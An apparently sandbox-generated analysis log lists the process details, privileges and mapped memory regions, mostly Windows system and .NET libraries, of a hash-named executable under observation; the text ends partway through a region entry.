# Flog Txt Version 1 # Analyzer Version: 4.4.1 # Analyzer Build Date: Jan 14 2022 06:06:11 # Log Creation Date: 15.02.2022 09:36:27.456 Process: id = "1" image_name = "69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe" page_root = "0x735ae000" os_pid = "0xf18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x618" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 117 start_va = 0x10000 end_va = 0x1bfff monitored = 1 entry_point = 0x1693e region_type = mapped_file name = "69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe") Region: id = 118 start_va = 0x20000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 119 start_va = 0x40000 end_va = 0x41fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 120 start_va = 0x50000 end_va = 0x64fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 121 start_va = 0x70000 end_va = 0xaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 122 start_va = 0xb0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 123 start_va = 0x1b0000 end_va = 0x1b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 124 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 125 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 126 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 127 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 128 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 129 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 130 start_va = 0x7fff0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 131 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 132 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 270 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 271 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 272 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 273 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 274 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 275 start_va = 0x500000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 276 start_va = 0x6e6a0000 end_va = 0x6e6f8fff monitored = 1 entry_point = 0x6e6b0780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 277 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 278 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 279 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 280 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 281 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 282 start_va = 0x500000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 283 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 284 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 285 start_va = 0x77b10000 end_va = 0x77b8afff monitored = 0 entry_point = 0x77b2e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 286 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 287 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 288 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 289 start_va = 0x560000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 290 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 291 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 292 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 293 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 294 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 295 start_va = 0x7c0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 296 start_va = 0x6e7f0000 end_va = 0x6e868fff monitored = 1 entry_point = 0x6e7ff82a region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 297 start_va = 0x77590000 end_va = 0x775d4fff monitored = 0 entry_point = 0x775ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 298 start_va = 0x752b0000 end_va = 0x7546cfff monitored = 0 entry_point = 0x75392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 299 start_va = 0x77440000 end_va = 0x7758efff monitored = 0 entry_point = 0x774f6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 300 start_va = 0x750d0000 end_va = 0x75216fff monitored = 0 entry_point = 0x750e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 301 start_va = 0x4c0000 end_va = 0x4e9fff monitored = 0 entry_point = 0x4c5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 302 start_va = 0x8a0000 end_va = 0xa27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 303 start_va = 0x75660000 end_va = 0x7568afff monitored = 0 entry_point = 0x75665680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 304 start_va = 0xa30000 end_va = 0xbb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 305 start_va = 0xbc0000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 306 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 307 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 308 start_va = 0x1f0000 end_va = 0x1f7fff monitored = 1 entry_point = 0x1f693e region_type = mapped_file name = "69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe") Region: id = 309 start_va = 0x77320000 end_va = 0x7732bfff monitored = 0 entry_point = 0x77323930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 310 start_va = 0x71e20000 end_va = 0x71e27fff monitored = 0 entry_point = 0x71e217b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 311 start_va = 0x6dd30000 end_va = 0x6e3e0fff monitored = 1 entry_point = 0x6dd45d20 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 312 start_va = 0x6dc30000 end_va = 0x6dd24fff monitored = 0 entry_point = 0x6dc84160 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\SysWOW64\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll") Region: id = 313 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 314 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 315 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 316 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 317 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 318 start_va = 0x660000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 319 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 320 start_va = 0x680000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 321 start_va = 0x690000 end_va = 0x690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 322 start_va = 0x7c0000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 323 start_va = 0x890000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 324 start_va = 0x1fc0000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 325 start_va = 0x7c0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 326 start_va = 0x860000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 327 start_va = 0x1fc0000 end_va = 0x20bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 328 start_va = 0x20f0000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 329 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 330 start_va = 0x2100000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 331 start_va = 0x4100000 end_va = 0x419ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 332 start_va = 0x800000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 333 start_va = 0x41a0000 end_va = 0x429ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041a0000" filename = "" Region: id = 334 start_va = 0x42a0000 end_va = 0x45d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 335 start_va = 0x6ca00000 end_va = 0x6dc27fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll") Region: id = 336 start_va = 0x74ad0000 end_va = 0x74bbafff monitored = 0 entry_point = 0x74b0d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 337 start_va = 0x45e0000 end_va = 0x4670fff monitored = 0 entry_point = 0x4618cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 338 start_va = 0x71ee0000 end_va = 0x71f54fff monitored = 0 entry_point = 0x71f19a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 339 start_va = 0x45e0000 end_va = 0x469ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 340 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 341 start_va = 0x6e880000 end_va = 0x6e8fdfff monitored = 1 entry_point = 0x6e881140 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll") Region: id = 342 start_va = 0x74d80000 end_va = 0x74e11fff monitored = 0 entry_point = 0x74db8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 343 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 344 start_va = 0x6c050000 end_va = 0x6c9fbfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\cc4e5d110dd318e8b7d61a9ed184ab74\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\cc4e5d110dd318e8b7d61a9ed184ab74\\system.ni.dll") Region: id = 345 start_va = 0x6e510000 end_va = 0x6e69cfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\system.drawing.ni.dll") Region: id = 346 start_va = 0x6b3f0000 end_va = 0x6c048fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.windows.forms.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\8cd2187094ba6cade0ca0fab4f932654\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\8cd2187094ba6cade0ca0fab4f932654\\system.windows.forms.ni.dll") Region: id = 347 start_va = 0x840000 end_va = 0x840fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 348 start_va = 0x840000 end_va = 0x841fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 349 start_va = 0x850000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 350 start_va = 0x870000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 351 start_va = 0x880000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 352 start_va = 0x20c0000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 353 start_va = 0x20d0000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 354 start_va = 0x850000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 355 start_va = 0x75690000 end_va = 0x76a8efff monitored = 0 entry_point = 0x7584b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 356 start_va = 0x76a90000 end_va = 0x76ac6fff monitored = 0 entry_point = 0x76a93b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 357 start_va = 0x76e20000 end_va = 0x77318fff monitored = 0 entry_point = 0x77027610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 358 start_va = 0x775e0000 end_va = 0x7766cfff monitored = 0 entry_point = 0x77629b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 359 start_va = 0x74e20000 end_va = 0x74e63fff monitored = 0 entry_point = 0x74e27410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 360 start_va = 0x77670000 end_va = 0x7767efff monitored = 0 entry_point = 0x77672e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 361 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 362 start_va = 0x45e0000 end_va = 0x466efff monitored = 0 entry_point = 0x45edd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 363 start_va = 0x4690000 end_va = 0x469ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 364 start_va = 0x6e750000 end_va = 0x6e7e1fff monitored = 0 entry_point = 0x6e75dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 365 start_va = 0x46a0000 end_va = 0x478ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 366 start_va = 0x880000 end_va = 0x880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 367 start_va = 0x46a0000 end_va = 0x475bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046a0000" filename = "" Region: id = 368 start_va = 0x4780000 end_va = 0x478ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 369 start_va = 0x880000 end_va = 0x883fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 370 start_va = 0x20c0000 end_va = 0x20c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 371 start_va = 0x4790000 end_va = 0x499afff monitored = 0 entry_point = 0x483b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 372 start_va = 0x73f60000 end_va = 0x7416efff monitored = 0 entry_point = 0x7400b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 373 start_va = 0x20d0000 end_va = 0x20d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 374 start_va = 0x20e0000 end_va = 0x20e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020e0000" filename = "" Region: id = 375 start_va = 0x4790000 end_va = 0x48dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004790000" filename = "" Region: id = 376 start_va = 0x71ec0000 end_va = 0x71edcfff monitored = 0 entry_point = 0x71ec3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 377 start_va = 0x20d0000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 378 start_va = 0x45e0000 end_va = 0x45effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 379 start_va = 0x6e480000 end_va = 0x6e500fff monitored = 0 entry_point = 0x6e486310 region_type = mapped_file name = "riched20.dll" filename = "\\Windows\\SysWOW64\\riched20.dll" (normalized: "c:\\windows\\syswow64\\riched20.dll") Region: id = 380 start_va = 0x71860000 end_va = 0x71875fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 381 start_va = 0x6e710000 end_va = 0x6e740fff monitored = 0 entry_point = 0x6e7222d0 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\SysWOW64\\msls31.dll" (normalized: "c:\\windows\\syswow64\\msls31.dll") Region: id = 382 start_va = 0x20d0000 end_va = 0x20d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 383 start_va = 0x45e0000 end_va = 0x45e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045e0000" filename = "" Region: id = 384 start_va = 0x45f0000 end_va = 0x45f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045f0000" filename = "" Region: id = 385 start_va = 0x4600000 end_va = 0x460ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 386 start_va = 0x6a610000 end_va = 0x6a77afff monitored = 0 entry_point = 0x6a67e360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 387 start_va = 0x48e0000 end_va = 0x4a5ffff monitored = 1 entry_point = 0x0 